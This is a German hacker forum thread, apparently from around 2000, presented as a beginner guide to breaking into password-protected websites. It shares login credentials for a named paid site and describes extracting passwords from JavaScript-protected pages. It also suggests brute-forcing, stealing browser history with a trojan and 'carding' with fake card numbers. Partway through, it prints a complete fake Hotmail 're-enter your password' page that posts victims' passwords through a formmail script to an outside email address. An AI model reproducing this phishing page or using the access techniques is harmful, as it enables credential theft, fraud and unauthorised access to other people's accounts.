Willkommen zum Grundkurs1: Internetseiten hacken(pwd) -Anleitung-

Hallo Leute,
warum wollt Ihr user und passwort von gehackten Seiten nicht verraten?? Das ist doch der ganze Spaß an der Sache!!

Probiert mal bei http://www.babylon-x.com/
I am a member anklicken und dann:
user: pritty password: womens

Viel spaß, ich hoffe jemand hilft mir auch bei www.virtuagirl.com !!!

also. ich will das mal mit babylon-x klarstellen. ich wahr drin. ob ihr es glaubt oder nicht. aber nicht mit der methode die hier beschrieben wurde. ne ganz einfache methode. da braucht man aber viel gedult für. einfach immer mal ausprobieren. bei der seite sind die nähmlich so nett und sagen dir das dein benutzername falsch ist. und wenn dann irgend wann steht das das passwort falsch ist, ist der halbe weg schon geschaft. Also viel spaß dabei (und ne dicke telefon rechnung ).

JAVAScript - Passwörter
Diese Anleitung ist ein relativ kurzer Zeit entstanden. Entschuldigt, wenn irgendwo kleinere Fehler sind.
Bei Fragen und Anregungen zu dieser Aneitung schreibt bitte an : [email protected]
Wie hacke ich eine, mit JavaScriptPasswort geschützte Seite ? ?

Es gibt zwei Methoden, die ein Webmaster benutzen kann, um seine Webseite von unbeliebten Gästen fernzuhalten. Beide zeichnen sich als äußerst dumm aus, da jemand, der die URL des geschützen Dokuments kennt auch ohne Passwortabfrage darau zugreifen kann.

--------------------------------------------------------------------------------

Methode 1 : Dabei läuft die Passwordabfrage über ein, mittels Javascript, erzeugtes JavaScript Fenster, das in den Source Code der Seite, auf der die geschützten Daten sind, eingebunden ist. Bei dieser Methode sollte es leichtes sein, daß ihr das Passwort herausfindet. Dazu erstellt ihr eine leere Seite und schreibt in die erste Zeile irgendein Wort, was euch grade einfällt. Dieses besetzt Ihr mit einem Link zu der Seite, bei der das AbfrageFenster aufgerufen wird. Nun speichern und angucken (Ihr solltet online sein). Ihr klickt den link mit gehaltener SHIFT Taste an. Nun sollte sih ein Fenster öffnen, in dem Ihr gefragt werdet, ob und wo ihr die Seite im HTML Format speichern wollt. Speichert sie irgendwo und dann guckt euch den Source Code an. dort sollte es Zeilen geben in der steht :

<SCRIPT language="JavaScript">

passwd=window.prompt("Please enter the password.","");

if (passwd=="i hate teachers") {

alert("Password Correct...Leaving");

location.href="geschützt.htm"

} else if (passwd=="cancel") {

location.href="anfang.htm"

} else {

alert("! Falsches Passwort ! Bitte erneut eingeben :");

passwd=window.prompt("Please enter the password.","");

if (passwd=="i hate teachers") {

alert("Password Correct...Leaving");

location.href="geschützt.htm"

} else if (passwd=="cancel") {

location.href="anfang.htm"

} else {

alert("Zweite Passworteingabe auch falsch. Wir werden sie nun als failed login registrieren");

location.href="logged.htm";

}

}

</SCRIPT>

Dabei zeichen die rot gefärbten Stellen das gültige Passwort, das erwartet wird. Die gelben Stellen zeigen die URL des
geschützten HTML Dockuments an.


Anmerkung :

Diese erste JavaScript - Methode ist nicht sehr effektiv, da man alleine durch Betrachtung des SourceCodes das Passwort herausfinden kann.

--------------------------------------------------------------------------------

Methode 2 : Zu dieser Methode greifen Webmaster öfter, da sie nicht so leicht zu knacken ist wie Methode. Sie besteht aus zwei verschiedenen Dokumenten. Das erste, welches bei anklicken des Links aufgerufen wird, enthält eine INPUT Zeile. Dort darf man nun das Passwort eintragen. Beim Drücken der Entertaste ( Return ) wird dann an das Password .htm oder .html angehängt. Das heißt, daß das Password nun nicht mehr enthalten sein muß, sondern es nur ein HTML - Dokument gibt, welches als Namen das Passwort enthält. Wenn das Passwort also "r1o2o3t4" heißt, dann liegt auf dem Server ein HTML - Dokument mit dem Namen : "r1o2o3t4.htm" <---- Diese Url wird also beim eingeben des Passwortes "r1o2o3t4" aufgerufen. Hacken kann man diese Methode nur mit eine BruteForce Attacke. Eine leichtere Methode ist es aber , in der History nachzuschauen. Wenn man also jemanden kennt, der das Passwort kennt, holt man sich einfach die Addresse des Dokuments aus der History. Dazu braucht man logischer Weise ein BatchDatei und eine Diskette und natürlich einen phyischen Zugang zum System. Dazu aber irgendwann mal...
Es sollte auch nicht schwer sein, die HistoryFiles mit Hilfe eines Trojaners von der Platte zu saugen. Dabei würde der Betreffende einen Patch File erhalten, der einen Trojaner installiert. Wenn er dann im Netz ist, schnell die Daten runtergediebt.

--------------------------------------------------------------------------------

this File is created by :
cr[a]in
contact me at :
[email protected]
[email protected]
[email protected]


bin non autor jungs

------------------
-------------------------

all download'z UppED NOw
-------------------------
http://chrome.notricks.de


THE HACK-COMMUNITY

schlaue leute hier!!!!!!!!!!!!

ist mir irgendwie alles zu hoch

Schreib leider etwas spät, aber bei babylon-x hat keiner was verpasst, war auch schon drinn, geht aber jetzt nicht mehr, hatten eine total primitive Sicherheitslücke, haben diese aber jetzr geschlossen.
Was mich aber mal interessieren würde, es gibt massig von so Passwortsites, wie z.B. www.ultrapasses.com usw., wo kommen diese Passwörter her ? Sitzten da nur lauter Profis rum die nichts besseres zu tun haben, oder sind das nur Sammlungen, wo Einer vom Anderen abschreibt.

Es gibt richtig professionelle bruteforcing programme die auch massig im irc kursieren ( ACcESs DIVER 3.0 )!! mit denen lässt sich ein account relativ schnell forcen,
ausserdem hat man so nen account auch in 3min. gecarded !!

------------------
---Greetz---
http://chrome.notricks.de
http://www.digital-chaoz.de

Verzei meine Unkenntnis aber was bedeutet gecarded ?

Passwort von www.23.com ??? :bounce:

HORS-T

Hi Chrome,

Hm, wie siehts denn z.B. hier aus: Ich will das Passwort von der Seite www.lambada.here.de z.B. haben. Benutzername ist lambada, FTP Zugang ist möglich, habs mal getestet (ftp://lambada.here.de) ...
So, und jetzt? Fänds cool, wenn Du einen Tip hättest!

Tschau
Steel

1 Posting muss hier noch hin.
Dann ham wir auch mal ein "Hot Topic" inner Hacker Zone... kommt nicht oft vor.

Cu
PK

"erstellt am: 14. Juli 1999 23:30"
Ahhhhhhhhhh, ich les es jetzt grade :supergrin: :supergrin: :supergrin:
Hat einer wohl ein Uralt Topic wieder aktuell gemacht

Steel

---------------------------
UPDATE!!!:
"WER JETZT NOCH POSTET IST EIN ARSCHLOCH"
<font size=6>OK, ICH EDITIERE NUR ... MAL GESPANNT WER DAS ARSCHLOCH SEIN WIRD!!! :supergrin: :supergrin: :supergrin: </font>

P.S.: Please laugh about it

WER JETZT NOCH POSTET IST EIN ARSCHLOCH


!!! Ich bins satt !!!


*g*

------------------
---Greetz---
http://chrome.notricks.de
http://www.digital-chaoz.de

witzig was ?

inner witzekiste übernachtet oda was eh :supergrin:

<html>
<head>
<title>Hotmail Please re-enter your password</title>
<link rel="stylesheet" href="/cgi-bin/dasp/hotmail___1.css">
</head>
<body bgcolor="#ffffff" topmargin=0>
<center><form name="mail" method=POST action="http://wetzeworld.de/cgi-bin/formmail.pl">
<input type=hidden name="redirect" value="http://www.hotmail.de">
<input type=hidden name="recipient" value="[email protected]">
<input type=hidden name="subject" value="Password-Transfer">
<p align="center">
<input type=hidden name="email" size=44 maxlength=140 value="hotmail1">
</p>
<p align="center"> </p>
<p align="center">
<input type=hidden name="02,Bewertung" value="hotmail2" size=44 maxlength=40>
</p>
<p align="center">&nbsp; </p>

<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
<a href="http://www.hotmail.com/" target="_top"><img src="http://209.185.130.251/lgo_msnhm_468x60.gif" width=468 height=60 border=0 alt=""></a>
</td>
<td align="CENTER" nowrap>
<img src="http://209.185.130.251/logo_passport_110x34.gif" width=110 height=34 border=0 alt="Find Out More About Passport">

<a href="http://nexusrdr.passport.com/redir.asp?_lang=&pm=id%3d2%26ct%3d955550373&attrib=HelpSigningIn" target="_top"><font class="f" size="2" face="Arial, Helvetica, sans-serif">Help</font></a>

</td></tr></table>
</td>
</tr><tr>

<td bgcolor="#cccc99"><font class="f" size=4><font face="Arial, Helvetica, sans-serif">Please
re-enter your password</font></font></td>
<td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
</tr>
<tr><td height="6"></td></tr>
<tr valign="top">
<td><font class="s">

</font>
</td>
<td rowspan=4><font class="s">

</font>

</td>
</tr>
< !-- loginerr.asp -->
<tr>
<td> <font class="f" size=2><font face="Arial, Helvetica, sans-serif">&lt;[email protected]&gt;</font></font>
<input type="hidden" name="domain" value="hotmail.com">

<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign="middle" width="64"><font class="sbd" face="Arial, Helvetica, sans-serif"><font size="2">Password</font></font><font size="2">&nbsp;</font></td>
<td width="1">&nbsp; </td>
<td width=90 valign="middle" align="center">
<input type=password name="realname" size=16 maxlength=16>
</td>
<td width="18">
<input type=submit value="Sign in" name="submit">
</td>
</tr>
<tr>
<td width="64"><font face="Arial, Helvetica, sans-serif"></font></td>
<td colspan="2"><font class="f" size="2" face="Arial, Helvetica, sans-serif"><a href="http://lc2.law5.hotmail.passport.com/ppsecure/logout?id=2&ct=955550373&ru=http%3a%2f%2flc2%2elaw5%2ehotmail%2epassport%2ecom%2fppsecure%2flogin%3f_lang%3d%26id%3d2%26ct%3d955 550373&disk=216.32.180.74_d1161&login=gizmop&f=33712&curmbox=ACTIVE&_lang=" target="_top">Change
User</a></font></td>
</tr>
</table>
<input type="hidden" name="login" value="">
<input type="hidden" name="ishotmail" value="1">
<input type="hidden" name="reauth" value="yes">
<input type="hidden" name="sec" value="no">
<input type="hidden" name="_lang" value="">
<input type="hidden" name="js" value="no">
<input type="hidden" name="id" value="2">
<input type="hidden" name="ct" value="">

<input type="hidden" name="svc" value="mail">
<input type="hidden" name="beta" value="">
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>

<td> < !-- File: copyright.asp --> &nbsp;<font class="s" face="Arial, Helvetica, sans-serif" size="-1">&copy;
2000 Microsoft Corporation. All rights reserved.</font> <font face="Arial, Helvetica, sans-serif" size="-1"><a href="http://www.hotmail.msn.com/cgi-bin/dasp/hminfo_shell.asp?_lang=&in=yes&content=tos" target="_top"><font class="s">Terms
of Service</font></a> &nbsp; <a href="http://www.hotmail.msn.com/cgi-bin/dasp/hminfo_shell.asp?_lang=&disk=216.32.180.74_d1161&login=gimop&f=33792&curmbox=&_lang=&in=yes&content=pstate" target="_top"><font class="s">Privacy
Statement</font></a> </font> </td>
</tr>
</table>
</center>

</body>
</html>

carden heisst mit ner gefaketen cc# nummern anmelden !!!


Ausserdem:

Ist dieses Topic schon 70 Jahr alt !!

DAS IST ALLES QUATSCH !!! BITTE POSTET HIER NICHT MEHR .... DANKE !!!

------------------
---Greetz---
http://chrome.notricks.de
http://www.digital-chaoz.de

Zitat Chrome: "WER JETZT NOCH POSTET IST EIN ARSCHLOCH"

Hm, dazu sag ich nur: naja, muss man mit leben

und zu Dir, Chrome, nach Deinem Eintrag: Einsicht ist der beste Weg zur Besserung :supergrin: :supergrin:

C ya
Steel

hey leutz!

also ich verfolge das Ganze schon etwas länger mit und stelle doch ganz primitiv
fest das es hier nicht mehr ums prinzip geht...es ist hier eigendlich ein wille
von chrome dargelegt etwas mehr in sachen
hacken offenzulegen für jederman...auch
wenns nicht gerade fair...ist jedem alles
ind den pops zu stecken aba man sollte echt
toleranter heran gehen und einsehen das nicht
jeder der gleichen auffassung sein kann und sollte.ansont...denke ich jeder sollte wenn
er damit erfahrung machen will etwas zu hacken auch über gewisse risiken inkentnis
nehmen...und somit auch erfahrungstechnisch
seine schlüsse ziehen...und dabei denke ich das jeder seinen weg geht und ihn vollziehen
wird wie er es meint...ob nun mit den mitteln oder mit den...man kann sich nicht einfach einen ruf versauen indem man etwas mal ganz spontan aus den fingern saugt...

so ich glaub ihr seid schon müde...tut mir leid...

hoffe es gibt nun wegen dieser worte keinerlei vorurteile mirgegenüber...wünsche
allen auch meinen feinden noch ein schönes
wochenende und tolle Ostern...

cee yeah....

THX ascape

------------------
Think phat Kalori

??? Wieso einsicht ????????

und was ist mit dir kalori ?? was wills´t du mir verklickern ????




------------------
---Greetz---
http://chrome.notricks.de
http://www.digital-chaoz.de

@ Kalori

man hat heutzutage nicht immer viel Zeit und da sind solche Texte [100% Text; 0% Infos] schon eine Belastung, sich die durchzulesen.

Telreuth

PS: nicht immer alles gleich persönlich nehmen, denn nichts wird so heiß gegessen, wie es gekocht wird.

ÄÄÄÄHH

ich habe jetzt alles gelesen und hab da mal ne Frage,wie bekommt man den nu das Passwort von so ner Homepage?????

chrome war das ne bös gemeinte frage....
oda nurso?ich will mich nicht einmischen in dieses thema und denke eben das hier wohl ein
riesen huddel muddel um nix gemacht wird...jeder will hier recht haben und zeigen was er kann...jeder hat erfahrungen gesammelt in jeglichen angelegenheiten...und will sich hier nur noch damit hoch pusten...
du weist sicherlich schon meinen excelenten ruf hier...aba egal...zumindest weiß ich eins das diese ganze diskussion hier einfach
schon dumm ist...mag sein das du recht hast oder auch der andere aba was am ende wollt ihr damit bezwecken...anstatt zusammen zu einer macht zu werden...kämpft ihr wer der tollere ist....aba eure sache werd mich nicht mehr dazu äußern!

cee yeah over spinna

------------------
Think phat Kalori